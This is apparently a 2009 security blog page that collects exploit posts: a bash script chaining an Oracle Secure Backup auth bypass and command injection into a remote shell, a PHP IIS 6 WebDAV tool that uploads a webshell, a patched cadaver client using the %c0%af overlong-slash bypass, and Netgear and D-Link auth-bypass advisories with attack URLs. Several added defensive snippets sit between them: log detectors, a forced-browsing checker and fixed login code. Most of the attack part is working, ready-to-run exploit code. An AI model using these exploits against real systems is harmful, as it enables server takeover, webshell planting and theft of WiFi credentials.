Oct 06

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI disclosed a few details regarding a couple of interesting vulnerabilities within the Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename "$0") <target IP>"
    echo "i.e.: ./$(basename "$0") 192.168.0.100"
    exit 1
fi

if ! command -v curl >/dev/null
then
    echo "'curl' is required in order to handle HTTPS connections"
    exit 1
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token.
#The user name starts with "--", which is what triggers the bypass (see ZDI-09-058):
#the login succeeds without credentials and the server hands back a usable PHPSESSID.
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=$(curl -kis "https://$TARGET/login.php" -d "$postdata" | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1)

if [[ -z $session ]]
then
    echo "[!] Fatal error. No valid token has been retrieved"
    exit 1
fi

echo "[+] I got a valid token: $session"

#Use the valid session and CVE-2009-1978 in order to inject arbitrary commands.
#"%26" is a URL-encoded "&": the vollist value ends up on a command line, so "1&ver>file"
#runs "ver" and redirects its output to a file in the web root, from where it is fetched back.
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=$(curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft)

if [[ -z $check ]]
then
    echo "[!] Fatal error. I cannot execute arbitrary commands"
    exit 1
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo ">$check"

while true; do
    echo -n ">"
    read -r cmd
    if [ "$cmd" == "EXIT" ]
    then
        echo "[+] Removing the temporary file and closing"
        shell="1%26del%20osb103shelltmp"
        curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
        exit 0
    fi
    #URL-encode every byte of the command as %XX. "-v" stops od from collapsing repeated
    #bytes into "*", and the newline od emits every 16 bytes is dropped so long commands
    #do not break the request line.
    cmd=$(echo -n "$cmd" | od -An -v -tx1 | tr -d '\n' | tr ' ' '%')
    shell="1%26$cmd>osb103shelltmp"
    curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
    echo "[+] Last successful command execution:"
    curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end
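
The command injection above leaves a trace the login bypass does not: the GET to property_box.php, including the encoded vollist value, is written to the web server's access log. The following detection logic is an added example, not part of the PoC or of Oracle's product; the log lines are constructed in Apache combined format, and the parameter names (property_box.php, type=CheckProperties, vollist) are taken from the script above. It percent-decodes the vollist value and flags anything carrying shell metacharacters, including double-encoded variants.

```python
"""Flag access-log lines carrying a CVE-2009-1978-style payload: a request to
property_box.php whose 'vollist' parameter, once percent-decoded, contains
shell metacharacters. Added detection example; log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside an Apache/NCSA combined log entry:  "GET /path?query HTTP/1.1"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Characters that let a value break out of the command the server builds from it.
SHELL_META = set('&|;`<>$\n')

def decode_param(target, name):
    """Return the fully decoded values of `name` in a request target.

    parse_qs already decodes one layer (so the PoC's '%26' becomes '&' inside the
    value without splitting the query); the extra unquote catches double encoding.
    """
    raw = parse_qs(urlsplit(target).query, keep_blank_values=True).get(name, [])
    return [unquote(v) for v in raw]

def is_vollist_injection(line):
    m = _REQ_RE.search(line)
    if not m:
        return False
    target = m.group('target')
    if not urlsplit(target).path.endswith('/property_box.php'):
        return False
    return any(SHELL_META & set(v) for v in decode_param(target, 'vollist'))

def scan(lines):
    """Return the subset of log lines that look like vollist command injection."""
    return [l for l in lines if is_vollist_injection(l)]

# Constructed sample: the PoC's two requests, two benign ones, and a double-encoded attempt.
SAMPLE_LOG = [
    '192.168.0.50 - - [06/Oct/2009:12:00:01 +0200] "GET /property_box.php?type=CheckProperties&vollist=1%26ver>osb103shelltmp HTTP/1.1" 200 512 "-" "curl/7.19.5"',
    '192.168.0.50 - - [06/Oct/2009:12:00:02 +0200] "GET /osb103shelltmp HTTP/1.1" 200 88 "-" "curl/7.19.5"',
    '192.168.0.7 - - [06/Oct/2009:12:01:10 +0200] "GET /property_box.php?type=CheckProperties&vollist=VOL000001 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.0.7 - - [06/Oct/2009:12:01:11 +0200] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.0.50 - - [06/Oct/2009:12:02:00 +0200] "GET /property_box.php?type=CheckProperties&vollist=1%2526dir HTTP/1.1" 200 512 "-" "curl/7.19.5"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("[!] possible vollist injection:", hit)
```

The second sample line (the fetch of the output file) is deliberately not flagged on its own; correlating a property_box.php hit with a following GET for a non-.php file from the same client is the natural next step, but the file name is attacker-chosen, so that rule belongs in the correlation layer rather than here.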

Jun 16

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: Tom Neaves <tom@tomneaves.co.uk>
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below).  The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >

Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field.  If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm".  It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known.  All the script is
doing is making sure authentication is forced upon the user.  The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 Unauthorized)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script; the above are just a sample. In
addition, it is possible to pass arbitrary paths to the "webcm" script, as
shown below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate which files and directories exist
within the www root directory and beyond, using the 200, 403 and 404
response codes as a guide.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded.  Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves
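
The advisory's method generalises to any device that enforces authentication only in a wrapper CGI: request each file both through the gate and directly, and report the pairs where the gate refuses but the direct request succeeds. The checker below is an added example, not the advisory's code. It uses the DG632 paths named above; the `fetch` callable is injected so the logic runs offline against a constructed response table (a real run would pass `http_status_fetcher(host)`), and the direct status assumed for indextop.htm is hypothetical.

```python
"""Differential forced-browsing check for the webcm-gate pattern.
Added example; FAKE_ROUTER is a constructed response table."""
from dataclasses import dataclass
from urllib.parse import quote
import http.client

# webcm resolves nextpage relative to /cgi-bin/, hence the leading "../"
GATE = "/cgi-bin/webcm?nextpage=../{path}"

@dataclass
class Finding:
    path: str
    gated_status: int
    direct_status: int

def gated_url(path):
    return GATE.format(path=quote(path.lstrip("/")))

def direct_url(path):
    return "/" + path.lstrip("/")

def find_direct_access(paths, fetch):
    """Paths the gate refuses (401/403) but the server serves directly (200)."""
    findings = []
    for p in paths:
        g = fetch(gated_url(p))
        d = fetch(direct_url(p))
        if g in (401, 403) and d == 200:
            findings.append(Finding(p, g, d))
    return findings

def http_status_fetcher(host, timeout=5):
    """Real fetcher: GET `url` on `host` (port 80) and return only the status code."""
    def fetch(url):
        conn = http.client.HTTPConnection(host, timeout=timeout)
        try:
            conn.request("GET", url)
            return conn.getresponse().status
        finally:
            conn.close()
    return fetch

# Constructed table modelling the advisory's observations. The direct status for
# indextop.htm is an assumption (the page only says the file demands Basic auth).
FAKE_ROUTER = {
    "/cgi-bin/webcm?nextpage=../html/stattbl.htm": 401,
    "/html/stattbl.htm": 200,
    "/cgi-bin/webcm?nextpage=../html/modemmenu.htm": 401,
    "/html/modemmenu.htm": 200,
    "/cgi-bin/webcm?nextpage=../html/indextop.htm": 401,
    "/html/indextop.htm": 401,
}

def fake_fetch(url):
    return FAKE_ROUTER.get(url, 404)

CANDIDATES = ["html/stattbl.htm", "html/modemmenu.htm", "html/indextop.htm"]

if __name__ == "__main__":
    for f in find_direct_access(CANDIDATES, fake_fetch):
        print(f"{f.path}: gate {f.gated_status}, direct {f.direct_status}")
```

Feed it the file names harvested from modemmenu.htm (onload.htm, form.css, saveconfig.html, utility.js and so on) to turn the advisory's sample into a complete inventory for a given firmware.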

May 26

Title            : PHP <= 5.2.9 SafeMode Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8 and 5.2.6; earlier versions may also be affected
Vendor Site      : www.php.net

Vulnerability Discovered by : www.abysssec.com

Description:

This is another safe_mode bypass in PHP <= 5.2.9 on Windows. The problem
comes from the way PHP interfaces with the operating system's directory
structure: PHP does not account for the difference between path handling on
Linux and on Windows, and this lets an attacker execute commands on the
target machine even with safe_mode = On (php.ini setting).

Vulnerability:

On Linux, to open a directory such as the PHP directory you have to write
/usr/bin/php; \usr\bin\php does not work. Windows, however, does not
distinguish between slash and backslash, so c:\php and c:/php name the same
directory. That is not a vulnerability in itself, but because PHP's safe_mode
checks do not take it into account, a path written with "\" characters can be
used to escape safe_mode through functions such as exec().

PoC / Exploit:

original : www.abysssec.com/safemod-windows.zip
mirror   : www.milw0rm.com/sploits/2009-safemod-windows.zip

Note: this vulnerability is published for educational purposes only, to show
that the vulnerability exists; the author is not responsible for any damage
caused by using it.

For more information visit Abysssec.com
Feel free to contact me at admin [at] abysssec.com

May 22

<?php

print_r('
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********

       Usage: php '.$argv[0].' source/path/put host path [file]
       Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
       Example2: php '.$argv[0].' path www.tian6.com /secret/
       Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');

// validate arguments
if ($argc < 4) { echo "Not enough arguments."; die; }
if ($argv[1] != "source" && $argv[1] != "path" && $argv[1] != "put") { echo "Choose an action: source, path or put."; die; }
else { $action = $argv[1]; }

if (stristr($argv[2], "http://")) { echo "No http:// in the host!"; die; }
else { $host = $argv[2]; }

if (stristr($argv[3], "/") == false) { echo "Where is the / ?"; die; }
else { $path = $argv[3]; }

// send a raw request on port 80 and collect the whole response in $html
function sent($sock)
{
    global $host, $html;
    $ock = fsockopen(gethostbyname($host), 80);
    if (!$ock) {
        echo 'No response from '.$host; die;
    }
    fputs($ock, $sock);
    $html = '';
    while (!feof($ock)) {
        $html .= fgets($ock);
    }
    fclose($ock);
}

if ($action == "source") {
    // /blog/readme.asp -> /blog%c0%af/readme.asp : the overlong slash defeats the
    // authorisation check, and "Translate: f" makes WebDAV return the raw file instead of running it
    $position = strrpos($path, "/");
    $path = substr_replace($path, "%c0%af/", $position, 1);
    $sock = "GET ".$path." HTTP/1.1\r\n";
    $sock .= "Translate: f\r\n";
    $sock .= "Host: ".$host."\r\n";
    $sock .= "Connection: close\r\n\r\n";
    sent($sock);
    echo $html;
    die;
}
if ($action == "path") {
    // /secret/ -> /secret%c0%af/ then PROPFIND to list the protected collection
    $position = strrpos($path, "/");
    $path = substr_replace($path, "%c0%af", $position, 0);
    $body = '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';
    $sock = "PROPFIND ".$path." HTTP/1.1\r\n";
    $sock .= "Host: ".$host."\r\n";
    $sock .= "Connection: close\r\n";
    $sock .= 'Content-Type: text/xml; charset="utf-8"'."\r\n";
    $sock .= "Content-Length: ".strlen($body)."\r\n\r\n";
    $sock .= $body;
    sent($sock);
    // every <a:href> in the multistatus response is one entry of the listing
    $resultat = '';
    $bur = explode("<a:href>", $html);
    array_shift($bur);   // drop the headers and XML prologue before the first entry
    foreach ($bur as $line) { $no = strpos($line, "<"); $resultat .= substr($line, 0, $no)."\n"; }
    echo $resultat;
    die;
}
if ($action == "put") {
    // upload a text file through the bypassed path, then MOVE it to .asp so IIS executes it
    $file = isset($argv[4]) ? $argv[4] : "test.txt";
    echo "Remember, keep your file in type txt!\r\n\r\n";
    $data = file_get_contents($file);
    if ($data === false) { echo "Cannot read ".$file; die; }
    $name = basename($file);
    $position = strrpos($path, "/");
    $path = substr_replace($path, "%c0%af", $position, 0);
    $sock = "PUT ".$path.$name." HTTP/1.1\r\n";
    $sock .= "Host: ".$host."\r\n";
    $sock .= 'Content-Type: text/xml; charset="utf-8"'."\r\n";
    $sock .= "Connection: close\r\n";
    $sock .= "Content-Length: ".strlen($data)."\r\n\r\n";
    $sock .= $data;
    echo $sock; sent($sock); sleep(2);
    $sock = "MOVE ".$path.$name." HTTP/1.1\r\n";
    $sock .= "Host: ".$host."\r\n";
    $sock .= "Connection: close\r\n";
    $sock .= "Destination: ".$path."racle.asp\r\n\r\n";
    sent($sock);
    echo "Be cool, man! Webshell is http://".$host.$path."racle.asp";
    die;
}

May 21

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a "dav:/>" prompt. Now just cd into the
# vulnerable folder and check out what's there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection '/secret/': succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying '/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here's a list of commands that I've tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
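Review bot: the `value` computed by the switch directly above is now dead code, because `ne_add_request_header(req, "Depth", "1");` ignores it; every PROPFIND goes out with Depth: 1 regardless of the depth the caller asked for (0 or infinity), and the compiler will warn about the unused assignment. If a fixed Depth: 1 is what the vulnerable server needs, say so in a comment and remove the switch; otherwise keep `ne_add_request_header(req, "Depth", value);` and override it only when the bypass is in use.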
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
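Review bot: `ne_buffer_czappend(req->headers, "Translate: f" EOL);` is appended unconditionally, so the header rides on every request neon builds (PUT, MOVE, PROPFIND, DELETE), not only the GETs for which it is needed. That is harmless for this tool, but a one-line comment on why it is there (Translate: f asks IIS to return the file rather than execute it, which is what makes `cat` on .asp files work) would help the next reader, and guarding it with a flag would keep the library usable for ordinary WebDAV work.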
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
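Review bot: `char *path2 = ne_calloc(strlen(path)+7);` is sized exactly (two leading characters, six bytes of `%c0%af`, the remainder of the path and the NUL), so it works, but it is allocated on every request and nothing frees it: `req->uri` later gets its own `ne_strdup` copy, so `path2` leaks. An `ne_free(path2)` after the `ne_strdup`, or building the string with `ne_concat(...)` straight into `req->uri`, would close the leak.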
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
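Review bot: in the `else` branch `path2 = path;` assigns the `const char *` parameter to a `char *` (discarded-qualifier warning) and throws away the buffer allocated in the previous hunk, while `sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);` depends on the caller having sized that buffer correctly two hunks away. Consider `snprintf(path2, strlen(path)+7, ...)` and a single code path that always fills `path2` (a plain copy for paths of two characters or fewer), so the allocation, the fill and the later `ne_strdup(path2)` line up. Also worth a comment: for `/secret/` this produces `/s%c0%afecret/`, i.e. the overlong slash lands inside the first segment, whereas the PHP tool above inserts it before the trailing slash.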
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
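Review bot: changing 0x25 from `PC` to `AL` reclassifies '%' as an unreserved character for the whole URI escaper, so `ne_path_escape` will never encode a literal '%' again. That is what lets the injected `%c0%af` through untouched, but it also means any path that genuinely contains '%' is sent malformed. Acceptable for a throwaway exploit build; if this patch is meant to live, limit the exemption to the injected sequence or escape the path before injecting it.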

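Both the PHP tool above and the cadaver patch rely on the same detail: `%c0%af` is a two-byte, overlong encoding of '/', which a strict UTF-8 decoder rejects but a lenient normaliser turns into a slash after the authorisation check has already run. The code below is an added example covering both posts; it is not taken from either tool. It builds the request paths each of them builds, contrasts a strict decoder with a constructed model of lenient decoding (a model for illustration, not IIS's actual code), and gives a detector for overlong sequences that a WAF or log filter could use.

```python
"""Overlong UTF-8 slash (%c0%af) as used by the IIS 6 WebDAV bypass.
Added example; decode_lenient is a constructed model, not IIS code."""
from urllib.parse import unquote_to_bytes

OVERLONG_SLASH = "%c0%af"   # 2-byte form of U+002F; valid UTF-8 uses exactly 1 byte

def inject_before_last_slash(path):
    """PHP tool style: /secret/ -> /secret%c0%af/, /blog/readme.asp -> /blog%c0%af/readme.asp"""
    i = path.rfind("/")
    if i < 0:
        raise ValueError("path must contain a '/'")
    return path[:i] + OVERLONG_SLASH + path[i:]

def inject_after_second_char(path):
    """cadaver patch style: /secret/ -> /s%c0%afecret/ (paths of <= 2 chars untouched)"""
    return path[:2] + OVERLONG_SLASH + path[2:] if len(path) > 2 else path

def decode_strict(target):
    """What a correct decoder does: the overlong sequence is an error, not a slash."""
    try:
        return unquote_to_bytes(target).decode("utf-8")
    except UnicodeDecodeError:
        return None

def decode_lenient(target):
    """Constructed model of a faulty normaliser that accepts 2-byte forms of ASCII:
    C0/C1 lead + continuation byte is folded into the code point it encodes."""
    raw = unquote_to_bytes(target)
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")

def has_overlong_utf8(target):
    """Detector: any C0/C1 lead byte, or an E0/F0 lead whose first continuation byte
    is too small to need a 3- or 4-byte sequence, is an overlong encoding."""
    raw = unquote_to_bytes(target)
    for i, b in enumerate(raw):
        nxt = raw[i + 1] if i + 1 < len(raw) else None
        if b in (0xC0, 0xC1):
            return True
        if b == 0xE0 and nxt is not None and nxt < 0xA0:
            return True
        if b == 0xF0 and nxt is not None and nxt < 0x90:
            return True
    return False

if __name__ == "__main__":
    for p in ("/secret/", "/blog/readme.asp"):
        t = inject_before_last_slash(p)
        print(p, "->", t, "| strict:", decode_strict(t), "| lenient:", decode_lenient(t))
    print("/secret/ ->", inject_after_second_char("/secret/"))
```

The detector is deliberately byte-based rather than relying on a UTF-8 decoder's error, so it still fires when the sequence is wrapped in a path the server would otherwise accept; normalise first and compare with the raw path, or reject on `has_overlong_utf8`, before any access-control decision.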
May 17

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and the auth_id is unique to the captcha image that you viewed
(this presumably allows the router to check the auth_code against the proper captcha image).
The problem is that if you leave off the auth_code and auth_id values, some pages in the
D-Link Web interface think that you’ve properly authenticated, as long as you get
the hash right:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a

Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:

    GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0

When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
retrieve the WPA passphrase directly from the router.

More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
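
The flaw is a check that runs only when the client supplies the parameters it verifies. The following is an added example modelled on the description above, not D-Link firmware code: a login handler with that defect beside a corrected one that requires an issued captcha, consumes it on use, and only then compares the password hash. The salted-MD5 construction (md5(salt + password)), the salt value and the captcha store are assumptions for illustration; the page does not give them.

```python
"""Captcha check skippable by omitting parameters, beside the corrected form.
Added example modelled on the D-Link post_login.xml description; constants are constructed."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

SALT = "constructed-salt"                       # assumption: real salt scheme not on the page
PASSWORD_HASH = hashlib.md5((SALT + "admin-password").encode()).hexdigest()

# auth_id -> expected auth_code, recorded when the captcha image was generated
CAPTCHAS = {}

def issue_captcha(code):
    """Server side of showing a captcha image: remember which code belongs to which id."""
    auth_id = secrets.token_hex(3).upper()
    CAPTCHAS[auth_id] = code
    return auth_id

def _eq(a, b):
    return hmac.compare_digest(a.encode(), b.encode())

def params_of(request_line):
    path, _, query = request_line.partition("?")
    return path, {k: v[0] for k, v in parse_qs(query).items()}

def login_vulnerable(request_line):
    """Verifies the captcha only if the client bothers to send it."""
    path, p = params_of(request_line)
    if path != "/post_login.xml" or not _eq(p.get("hash", ""), PASSWORD_HASH):
        return False
    if "auth_code" in p or "auth_id" in p:
        return CAPTCHAS.get(p.get("auth_id")) == p.get("auth_code")
    return True   # the bypass: no captcha parameters, no captcha check

def login_fixed(request_line):
    """Requires an issued captcha, consumes it (one-time use), then checks the hash."""
    path, p = params_of(request_line)
    if path != "/post_login.xml":
        return False
    expected = CAPTCHAS.pop(p.get("auth_id", ""), None)
    if expected is None or not _eq(expected, p.get("auth_code", "")):
        return False
    return _eq(p.get("hash", ""), PASSWORD_HASH)

if __name__ == "__main__":
    bare = f"/post_login.xml?hash={PASSWORD_HASH}"
    print("vulnerable, no captcha params:", login_vulnerable(bare))   # True
    print("fixed, no captcha params:     ", login_fixed(bare))        # False
    aid = issue_captcha("0C52F")
    print("fixed, real captcha:          ", login_fixed(f"{bare}&auth_code=0C52F&auth_id={aid}"))
```

The corrected handler consumes the captcha even when the password hash turns out to be wrong, so a guessing attacker has to solve a new captcha per attempt; the session that post_login.xml establishes, and the wifisc_add_sta.xml request it unlocks, are outside this model.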
